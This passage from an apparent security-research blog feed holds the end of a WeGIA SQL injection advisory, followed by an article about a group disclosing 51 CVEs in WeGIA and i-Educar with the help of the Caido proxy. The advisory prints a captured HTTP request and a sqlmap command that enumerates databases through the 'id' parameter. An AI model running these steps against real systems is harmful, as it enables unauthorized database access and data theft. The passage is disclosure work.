&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Save the request in req.txt file:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=1&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Windows&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Google Chrome&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://demo.wegia.org/html/home.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Then use sqlmap:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -r req -p id --risk=3 --level=5 --dbs --batch --dbms=mysql --batch 
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-52474/image.png&amp;#34;
	width=&amp;#34;1263&amp;#34;
	height=&amp;#34;568&amp;#34;
	srcset=&amp;#34;/p/cve-2025-52474/image_hu_41d3edbfdda17cfa.png 480w, /p/cve-2025-52474/image_hu_6c25fed07133c2cd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;222&amp;#34;
		data-flex-basis=&amp;#34;533px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage: Exposing customer data or business information can significantly harm the organization&amp;#39;s image.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 19 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Discovery of 51 CVEs - How Caido Helped Our Open Source Security Research</title>
        <link>https://www.cvehunters.com/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/</link>
        <guid>https://www.cvehunters.com/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/</guid>
        <description>&amp;lt;h2 id=&amp;#34;contributions-from-the-cve-hunters-group-using-caido&amp;#34;&amp;gt;Contributions from the CVE-Hunters Group using Caido
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Information security is a precious assistance to the design, installation, and ongoing updating of computer systems, especially for public, non-profit, or educational use. With cyber attacks and data breaches on the rise, never has it been more critical to improve the open-source project security.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Our group, CVE-Hunters, strives to find, research, and responsibly disclose vulnerabilities (CVEs) in widely used open-source software. We contribute to the global cybersecurity community by reporting CVEs, improving code security, and helping maintainers patch actual world security vulnerabilities before they become available for attack.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;contributions-from-the-cve-hunters-group-using-caido&amp;#34;&amp;gt;Contributions from the CVE-Hunters Group using Caido
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Information security is a precious assistance to the design, installation, and ongoing updating of computer systems, especially for public, non-profit, or educational use. With cyber attacks and data breaches on the rise, never has it been more critical to improve the open-source project security.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Our group, CVE-Hunters, strives to find, research, and responsibly disclose vulnerabilities (CVEs) in widely used open-source software. We contribute to the global cybersecurity community by reporting CVEs, improving code security, and helping maintainers patch actual world security vulnerabilities before they become available for attack.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;By on-job vulnerability research and live penetration testing, our program not only protects critical web applications but also provides hands-on training for the future generation of ethical hackers and cybersecurity experts. We try to foster a culture of active, open, and inclusive cybersecurity—allowing students and researchers to utilize state-of-the-art tools like Caido to perform simulated attacks, automate security testing, and facilitate secure development practices.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;project-objectives&amp;#34;&amp;gt;Project Objectives
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Our cybersecurity research is bounded by three core pillars underpinning technical excellence and societal responsibility:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Bolstering the security of commonly used open-source software with the discovery, verification, and support for remediation of real-world vulnerabilities. These core bugs—be they Cross-Site Scripting (XSS), Insecure Direct Object References (IDOR), or faulty authentication—may be exploited in production, exposing sensitive information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Offering experiential cybersecurity training to future professionals through real-world vulnerability assessment projects. Students gain hands-on experience in bug discovery, secure code analysis, and ethical vulnerability disclosure using modern security testing tools like Caido, Burp Suite, and custom automation scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Encouraging collaborative research and responsible CVE publication of Common Vulnerabilities and Exposures to facilitate awareness of developing threats, improve transparency, and assist with the continuous hardening of critical systems.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;case-1-wegia-platform&amp;#34;&amp;gt;Case 1: WeGIA Platform
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia.png&amp;#34;
	width=&amp;#34;1914&amp;#34;
	height=&amp;#34;959&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_2524eec9eeae804c.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_91fc3ba8afe4f7ad.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;199&amp;#34;
		data-flex-basis=&amp;#34;478px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;One of the main targets of our security research was the WeGIA (Web Manager for Assistance Institutions) web application — an open-source web application to manage third-sector institutions in Brazil, including NGOs, social shelters, and nonprofit institutions. Such organizations are highly reliant on donations, volunteer support, and secure processing of data to function effectively.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The security weaknesses that were discovered were among them critical ones such as unauthorized access, inadequate authentication processes, and data exposure vulnerabilities with considerable impact on confidentiality, integrity, and availability of sensitive information. In a fascinating collaborative pen testing challenge, CVE-Hunters community discovered, responsibly disclosed, and retried 48 security vulnerabilities (CVEs) in the WeGIA system. &amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Effective remediation and discovery of the security weaknesses made up the overall security status of the platform and facilitated long-term sustainability and trustiness of the software. This instance supports the necessity for constant vulnerability scanning and ethical hacking presence within the defense of open-source tools utilized in socially critical environments.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;case-2-i-educar-platform&amp;#34;&amp;gt;Case 2: i-Educar Platform
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar.png&amp;#34;
	width=&amp;#34;1914&amp;#34;
	height=&amp;#34;962&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_4322185b1b88d839.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_1cac18ecedf8c1b3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;198&amp;#34;
		data-flex-basis=&amp;#34;477px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Continuing our endeavor to promote the cybersecurity of critical digital infrastructure, our research team directed its focus on the i-Educar platform, a widely used open-source school management platform adopted by numerous public schools and institutions of learning in Brazil.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;i-Educar is designed to handle sensitive student data, including students&amp;#39; personal information, teachers&amp;#39; personal information, and learning histories. Thus, the platform becomes a premium target for any potential attackers and thus emphasizes the importance of securing it against future threats.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;During a professional application security audit, our team of researchers found other vulnerabilities in the i-Educar system. These included some authentication bypass, insecure exposure of data, and access controls that were improper in nature—both of which can potentially compromise educational information&amp;#39;s confidentiality, integrity, and availability.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;To date, 3 of the vulnerabilities have been officially assigned CVE IDs and responsibly disclosed to the project maintainers following best practices for coordinated disclosure. The remaining findings are awaiting technical validation and documentation and will be submitted for CVE publication in the coming weeks.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This case study illustrates the importance of vulnerability research to the education community, especially when dealing with open-source platforms which have been storing personally identifiable information (PII). Securing i-Educar, we are committed to making it easier for a secure online community for schools and students.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;support-tool-caido&amp;#34;&amp;gt;Support Tool: Caido
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido.webp&amp;#34;
	width=&amp;#34;2600&amp;#34;
	height=&amp;#34;1417&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_9c404777f95c89b8.webp 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_352aa15174226705.webp 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;183&amp;#34;
		data-flex-basis=&amp;#34;440px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In our thorough web app security testing, Caido has been one of our go-to tools to discover, exploit, and document vulnerabilities. Created for pen testers, security researchers, and bug bounty hunters in mind, Caido is a contemporary and lightweight alternative to Burp Suite that provides a user-friendly interface without any loss of features.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;With functionalities tailored to ethical hacking and web application penetration testing, Caido enables efficient workflows in both manual and semi-automated testing environments. Caido&amp;#39;s ability to intercept traffic, map the structure of sites, and manage enormous volumes of HTTP requests qualifies it to identify issues like XSS, CSRF, IDOR, authentication flaws, and insecure session ID management.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Apart from its clean UI and smoothness, Caido&amp;#39;s design is scalable—making it part of the best tools for security practitioners to look for an enterprise-level web vulnerability scanner and exploit tool in real-world engagements. Be it doing OWASP Top 10 testing or technical deep auditing, Caido is an integral component of an offensive security toolkit in the modern world.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;simple-and-functional-interface&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Simple and functional interface&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface.png&amp;#34;
	width=&amp;#34;974&amp;#34;
	height=&amp;#34;738&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_946c678debb29535.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_5a3572f402be32ad.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;316px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Caido has a minimal, modern, and user-friendly interface designed to ease the web application penetration testing process. Useful features such as a dynamic site map, full browsing history, and real-time interception of HTTP traffic allow security researchers to gain extensive visibility into the structure and operation of the targeted application.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;These allow for faster and more precise identification of potential attack vectors, making Caido the solution of choice among professionals looking for an easy-to-use yet powerful platform for real-time request exploration, parameter inspection, and vulnerability detection. From endpoint mapping complex endpoints to analyzing live sessions, Caido optimizes the process without compromising depth or precision.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;automation-with&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Automation with &amp;amp;ldquo;Automate&amp;amp;rdquo;&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate.png&amp;#34;
	width=&amp;#34;1424&amp;#34;
	height=&amp;#34;627&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_b71d2686d66b9f75.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_1ff1724a47fc979e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;227&amp;#34;
		data-flex-basis=&amp;#34;545px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The &amp;#34;Automate&amp;#34; feature of Caido allows security professionals to configure and execute customized vulnerability scans with precision and velocity. It is specifically helpful in automating the detection of common web application vulnerabilities such as Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Insecure Direct Object References (IDOR), and authentication or session management issues.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In supporting scripted test automation and payload injection for tailor-made payloads, Caido&amp;#39;s Automate functionality slashes manual labor significantly but boosts precision in identifying security issues in complex web environments. It is an ideal addition for penetration testers and bug bounty hunters alike to enhance their web application security testing using automated, efficient scans tailored to their specific testing scope.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;project-management&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Project management&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes.png&amp;#34;
	width=&amp;#34;882&amp;#34;
	height=&amp;#34;451&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_3ab3440b6ccc98cc.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_827f3f99ffd7ccda.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;195&amp;#34;
		data-flex-basis=&amp;#34;469px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Caido supports efficient penetration testing procedures through the capability to work on several projects simultaneously without having to restart the application. This kind of functionality is necessary for specialists with several web security tests to execute simultaneously, supporting easy switching between targets without jeopardizing information integrity.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;To make pentest campaign management even simpler, Caido has a full-featured Scopes feature. With it, users can effectively define, segment, and manage multiple testing scopes within one project. This proves useful to segment tests in terms of different domains, apps, or environments — improving organization, reducing noise, and supporting targeted vulnerability analysis.
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;By combining multi-project capability with scope-limited testing via environments, Caido keeps penetration testers, bug bounty hunters, and security researchers productive, effective, and concentrated on the most important bugs.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;filters-with-httpql&amp;#34;&amp;gt;&amp;lt;em&amp;gt;Filters with HTTPQL&amp;lt;/em&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters.png&amp;#34;
	width=&amp;#34;1324&amp;#34;
	height=&amp;#34;422&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_c24f37b46942eccd.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_b74b8191f7d2bf3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;313&amp;#34;
		data-flex-basis=&amp;#34;752px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The Caido HTTPQL search engine provides for precise filtering and thorough examination of HTTP requests, even for heavy web traffic. As a security researcher and penetration tester, this concise and straightforward query language assists you in quickly navigating colossal sets of data without being an expert programmer.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;With HTTPQL, advanced request filtering is made simpler to implement, and this accelerates the identification of security flaws such as injection points, authentication errors, and session irregularities, which makes it an essential utility for automated web traffic auditing and mass-scale vulnerability testing.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Caido also takes the lead in delivering cutting-edge features that make it stronger in real-world penetration testing and security auditing scenarios:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Invisible proxy:&amp;lt;/b&amp;gt; Conveniently captures and saves client and device network traffic that isn&amp;#39;t supported by manual proxy configuration. This is especially helpful when testing embedded software, IoT devices, mobile apps, and blocked browsers for deep security analysis in otherwise hard-to-test cases.&amp;lt;/li&amp;gt;
